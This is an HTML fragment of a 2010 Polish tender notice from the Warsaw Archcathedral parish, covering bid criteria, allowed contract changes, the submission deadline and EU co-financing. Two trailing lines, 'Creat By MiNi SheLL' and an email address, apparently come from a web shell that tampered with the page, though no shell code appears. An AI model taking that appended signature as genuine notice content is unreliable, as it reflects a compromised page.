<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Metodologia wykonania przedmiotu zamówienia - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany umowy na podstawie art. 144 ustawy Pzp w następujących sytuacjach:
a)	zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację przedmiotu Umowy,
b)	w przypadku zmiany osób biorących udział w realizacji zamówienia na Wykonawcy ciąży obowiązek wykazania Zamawiającemu przyczyny zmiany osoby, która w ofercie wskazana była do realizacji zamówienia oraz wykazać, że nowa osoba spełnia postawione przez Zamawiającego wymagania zawarte w SIWZ,
c)	zmiany w kolejności i terminach wykonywania usług, szczególnie spowodowanych czynnikami obiektywnymi (np. związanymi z koniecznością uzyskania niezbędnych pozwoleń, zgód etc.) 
d)	zastąpienie zakresu planowanych do wykonania usług innym zakresem usług przy zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji zamówienia. 
Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 144 ustawy zmiana nr rachunku bankowego Wykonawcy. Zmiana taka wymaga jedynie niezwłocznego pisemnego zawiadomienia drugiej Strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katedra.mkw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rzymsko - Katolicka Parafia Archikatedralna Św. Jana Chrzciciela w Warszawie, 
00-278 Warszawa 
ul. Kanonia 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2010 godzina 11:00, miejsce: Rzymsko - Katolicka Parafia Archikatedralna Św. Jana Chrzciciela w Warszawie, 00-278 Warszawa, ul. Kanonia 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej z Regionalnego Programu Operacyjnego Województwa Mazowieckiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com